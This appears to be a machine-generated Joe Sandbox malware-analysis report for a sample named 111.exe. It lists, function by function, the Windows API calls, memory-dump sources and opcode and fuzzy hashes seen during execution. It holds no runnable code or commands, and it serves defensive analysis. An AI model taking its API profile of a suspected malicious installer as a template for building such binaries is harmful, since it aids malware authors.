                                                                                                                                • Part of subcall function 00405948: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B
                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1892508949-0
                                                                                                                              • Opcode ID: e31fcadcab37bac22a81c9746c3fd4a69da7bcffd63bdc59142811eb2c8070a3
                                                                                                                              • Instruction ID: d42e9ae115e382ed64a017e661d14a8570f8e1ce7a364987760287960e16c3b9
                                                                                                                              • Opcode Fuzzy Hash: e31fcadcab37bac22a81c9746c3fd4a69da7bcffd63bdc59142811eb2c8070a3
                                                                                                                              • Instruction Fuzzy Hash: B411DD31504110EBCF206FA5CD4199F3BB0EF25369B28493BEA51B22F1DA3E49819A5E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402522 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3356406503-0
                                                                                                                              • Opcode ID: a5c2c2f865933dd9dc75393d5ad368344198f3d7cf79dd7b40a96e53c0bc7d37
                                                                                                                              • Instruction ID: af493c066ab36ea8406690c3d62a07c4fb2ed7115def6bf4d18b774961f6c260
                                                                                                                              • Opcode Fuzzy Hash: a5c2c2f865933dd9dc75393d5ad368344198f3d7cf79dd7b40a96e53c0bc7d37
                                                                                                                              • Instruction Fuzzy Hash: CD116A71910209EBCF14DFA4CA589AEB774FF04354B20843BE402B62C0D3B88A44DB5E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                                                                              • Instruction ID: f4b073df4371d13d5e47470e1508f1e4354d1df05d26164fcbedf483487d3525
                                                                                                                              • Opcode Fuzzy Hash: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                                                                              • Instruction Fuzzy Hash: 4D01F4316242209FE7094B389D05B6A3698E710319F14823FF855F65F1EA78DC029B4C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040554C Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040555C
                                                                                                                                • Part of subcall function 004043B3: SendMessageW.USER32(00070486,00000000,00000000,00000000), ref: 004043C5
                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004055A8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2896919175-0
                                                                                                                              • Opcode ID: d2a332491831c4654da67ced54ef67d1850a0752dee18129f9b682b3d19068c1
                                                                                                                              • Instruction ID: 6a06ef88286e8e28b2e5f67245905b551da98dc0848311234a90ef5522512259
                                                                                                                              • Opcode Fuzzy Hash: d2a332491831c4654da67ced54ef67d1850a0752dee18129f9b682b3d19068c1
                                                                                                                              • Instruction Fuzzy Hash: E3F02472500A00ABE3019B94AD02B9773A5EBC4301F1A503BEF84732E8DB3858018F5C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$EnableShow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1136574915-0
                                                                                                                              • Opcode ID: 3ebb4b6c0f57e11481d011874966e0d0d22a9f74758462fdaea170207406e6f9
                                                                                                                              • Instruction ID: 5d2b838fc97348560faaf82546316e7c29db3ee13ca796b15ebd5141c346d58e
                                                                                                                              • Opcode Fuzzy Hash: 3ebb4b6c0f57e11481d011874966e0d0d22a9f74758462fdaea170207406e6f9
                                                                                                                              • Instruction Fuzzy Hash: 6FE09A32A042009FD704EFA4AE484AEB3B4EB90325B20097FE401F20C1CBB85C008A2D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406806 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                                                                • Part of subcall function 00406796: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                                                                                • Part of subcall function 00406796: wsprintfW.USER32 ref: 004067E8
                                                                                                                                • Part of subcall function 00406796: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2547128583-0
                                                                                                                              • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                                                              • Instruction ID: c5f632ab0fd527bf8e68b4786b10832766149758e6d8e51d9ba55f9b7eb13659
                                                                                                                              • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                                                              • Instruction Fuzzy Hash: 30E0863350421056E211AA746E44C7B77A89F99750307843EF956F2080D738DC359679
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402B9D Relevance: 3.0, APIs: 2, Instructions: 21windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000000B,00000001), ref: 00402BAC
                                                                                                                              • InvalidateRect.USER32(?), ref: 00402BBC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 909852535-0
                                                                                                                              • Opcode ID: 4ec80bbe14dc5537c1cd2af9d9e2a45c75897dd92adcbb01d88f97f95724e089
                                                                                                                              • Instruction ID: 9c774efdcd349c070d6f56502ffe770b82a956e40f27e342527f76d7d8b27f4a
                                                                                                                              • Opcode Fuzzy Hash: 4ec80bbe14dc5537c1cd2af9d9e2a45c75897dd92adcbb01d88f97f95724e089
                                                                                                                              • Instruction Fuzzy Hash: FEE08C72710008FFDB00CFA4ED84DAEB779EB40315B00007AF502A10A0D7701C40CA28
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405F07 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\Public\111.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 415043291-0
                                                                                                                              • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                              • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                              • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                              • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405EE2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405AE7,?,?,00000000,00405CBD,?,?,?,?), ref: 00405EE7
                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405EFB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                              • Instruction ID: 11a24c4abb36edafbee48cc994cb64d758a4bce1ebd63d049f972be52462095a
                                                                                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                              • Instruction Fuzzy Hash: C7D0C9725045316BC2102728AF0889BBB55EB643717054A35F9A5A22B0CB314C528A98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403A06 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00403839,00000007,?,00000007,00000009,0000000B), ref: 00403A11
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\, xrefs: 00403A25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\
                                                                                                                              • API String ID: 2962429428-2865410112
                                                                                                                              • Opcode ID: ca63170edeea3439a57927142003076bc4eb0813d67b9f423991ea9fdc88c513
                                                                                                                              • Instruction ID: 4d38ec637c1dccf24593ac3126fe0249190c854309e3ef3cf5342704e05ae097
                                                                                                                              • Opcode Fuzzy Hash: ca63170edeea3439a57927142003076bc4eb0813d67b9f423991ea9fdc88c513
                                                                                                                              • Instruction Fuzzy Hash: 23C0123060070456D160AF75AE4EA053E645B8073AB604725B0F8B40F1CB3C5669896D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004059C5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,004034B8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 004059CB
                                                                                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059D9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1375471231-0
                                                                                                                              • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                              • Instruction ID: 1e5fcd6d8aa83e7c3539c134ce858d200345c8ad9b438ef6e258ac5dd368824a
                                                                                                                              • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                              • Instruction Fuzzy Hash: 27C04C71204541EEE6505B20AE09B177A909B50751F26843A6147F01A0DA388455E93D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004023AA Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
